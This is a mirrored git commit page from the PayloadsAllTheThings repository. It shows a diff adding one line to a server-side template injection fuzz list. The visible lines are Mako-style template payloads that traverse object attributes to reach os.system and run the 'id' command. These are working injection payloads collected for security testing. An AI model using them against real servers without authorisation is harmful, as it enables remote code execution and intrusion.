1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-27 13:06:03 +02:00

Update ssti.fuzz

This commit is contained in:
p0dalirius 2021-10-04 09:21:10 +02:00
parent 19214a7db4
commit 5518c14388

View File

@ -93,3 +93,4 @@ ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
${self.context._with_template.module.cache.compat.inspect.os.system("id")}
${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}